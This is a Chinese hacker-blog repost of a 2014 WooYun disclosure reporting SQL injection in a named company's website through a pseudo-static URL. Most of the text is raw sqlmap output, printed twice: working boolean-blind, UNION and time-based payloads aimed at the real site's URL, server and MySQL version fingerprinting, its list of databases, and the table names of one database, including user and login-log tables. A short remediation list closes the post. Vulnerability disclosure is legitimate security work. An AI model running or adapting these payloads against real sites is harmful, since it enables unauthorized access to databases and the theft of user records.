记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某厂商伪静态类型注入

2014-11-09 21:00

appmfl.com/?informationshow/tp/211/id/15.html

漏洞证明:

sqlmap identified the following injection points with a total of 57 HTTP(s) requests:

---

Place: URI

Parameter: #1*

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://appmfl.com:80/?informationshow/tp/211/id/15' AND 9133=9133 AND 'mDMQ'='mDMQ.html



Type: UNION query

Title: MySQL UNION query (NULL) - 20 columns

Payload: http://appmfl.com:80/?informationshow/tp/211/id/-1280' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7161676771,0x514d5754594d4b474d49,0x716f746b71)#.html



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: http://appmfl.com:80/?informationshow/tp/211/id/15' AND SLEEP(5) AND 'mcsb'='mcsb.html

---

web server operating system: Windows

web application technology: Apache 2.4.4, PHP 5.5.1

back-end DBMS: MySQL 5.0.11

available databases [10]:

[*] cdcol

[*] data

[*] information_schema

[*] jinhe

[*] jinhe2

[*] mysql

[*] performance_schema

[*] phpmyadmin

[*] test

[*] webauth



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: URI

Parameter: #1*

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://appmfl.com:80/?informationshow/tp/211/id/15' AND 9133=9133 AND 'mDMQ'='mDMQ.html



Type: UNION query

Title: MySQL UNION query (NULL) - 20 columns

Payload: http://appmfl.com:80/?informationshow/tp/211/id/-1280' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7161676771,0x514d5754594d4b474d49,0x716f746b71)#.html



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: http://appmfl.com:80/?informationshow/tp/211/id/15' AND SLEEP(5) AND 'mcsb'='mcsb.html

---

web server operating system: Windows

web application technology: Apache 2.4.4, PHP 5.5.1

back-end DBMS: MySQL 5.0.11

Database: jinhe

[47 tables]

+---------------------+

| cn_case |

| cn_down |

| cn_faq |

| cn_index_content |

| cn_index_img |

| cn_indexvisitrecord |

| cn_info |

| cn_links |

| cn_liuyan |

| cn_seo |

| cn_single |

| cn_video |

| mx_appcalist |

| mx_appgroups |

| mx_applivs |

| mx_datasyndic |

| mx_fieldatas |

| mx_fields |

| mx_fieldupload |

| mx_filters |

| mx_forms |

| mx_killpoison |

| mx_loginlogs |

| mx_menu |

| mx_mgroup |

| mx_mod_advs |

| mx_mod_blocks |

| mx_mod_slots |

| mx_mod_topic |

| mx_mod_topicstyle |

| mx_optlog_1312 |

| mx_optlog_1401 |

| mx_optlog_1402 |

| mx_optlog_1403 |

| mx_optlog_1404 |

| mx_optlog_1405 |

| mx_optlog_1406 |

| mx_optlog_1407 |

| mx_optlog_1408 |

| mx_outputsets |

| mx_pickimport |

| mx_picknode |

| mx_picktemps |

| mx_sitesearch |

| mx_uploads |

| mx_user |

| mx_vip_user |

+---------------------+



修复方案:

1.全面对检查输入段字符过滤

2.全面查找有没有后门

3. 使用第三方防火墙加固整个系统。

知识来源: www.wooyun.org/bugs/wooyun-2014-071952

阅读:79649 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“某厂商伪静态类型注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云